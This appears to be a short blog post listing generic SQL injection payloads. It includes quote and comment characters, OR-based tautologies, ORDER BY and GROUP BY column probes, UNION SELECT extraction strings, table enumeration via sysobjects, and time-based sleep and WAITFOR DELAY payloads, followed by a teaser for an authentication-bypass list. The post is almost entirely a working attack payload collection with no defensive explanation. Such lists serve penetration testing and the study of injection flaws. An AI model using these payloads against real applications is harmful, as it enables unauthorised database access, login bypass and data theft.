Tuesday, 23 May 2023

Generic SQL Injection Payloads

  •  '
  • ''
  • `
  • ``
  • ,
  • "
  • ""
  • /
  • //
  • \
  • \\
  • ;
  • ' or "
  • -- or # 
  • ' OR '1
  • ' OR 1 -- -
  • " OR "" = "
  • " OR 1 = 1 -- -
  • ' OR '' = '
  • '='
  • 'LIKE'
  • '=0--+
  •  OR 1=1
  • ' OR 'x'='x
  • ' AND id IS NULL; --
  • '''''''''''''UNION SELECT '2
  • %00
  • /*…*/ 
  • + addition, concatenate (or space in url)
  • || (double pipe) concatenate
  • % wildcard attribute indicator

  • @variable local variable
  • @@variable global variable


  • # Numeric
  • AND 1
  • AND 0
  • AND true
  • AND false
  • 1-false
  • 1-true
  • 1*56
  • -2


  • 1' ORDER BY 1--+
  • 1' ORDER BY 2--+
  • 1' ORDER BY 3--+

  • 1' ORDER BY 1,2--+
  • 1' ORDER BY 1,2,3--+

  • 1' GROUP BY 1,2,--+
  • 1' GROUP BY 1,2,3--+
  • ' GROUP BY columnnames having 1=1 --


  • -1' UNION SELECT 1,2,3--+
  • ' UNION SELECT sum(columnname ) from tablename --


  • -1 UNION SELECT 1 INTO @,@
  • -1 UNION SELECT 1 INTO @,@,@

  • 1 AND (SELECT * FROM Users) = 1

  • ' AND MID(VERSION(),1,1) = '5';

  • ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


  • Finding the table name


  • Time-Based:
  • ,(select * from (select(sleep(10)))a)
  • %2c(select%20*%20from%20(select(sleep(10)))a)
  • ';WAITFOR DELAY '0:0:30'--

  • Comments:

  • #     Hash comment
  • /*  C-style comment
  • -- - SQL comment
  • ;%00 Nullbyte
  • `     Backtick

No comments:

Post a Comment

SQL Injection Auth Bypass Payloads

 '-' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''...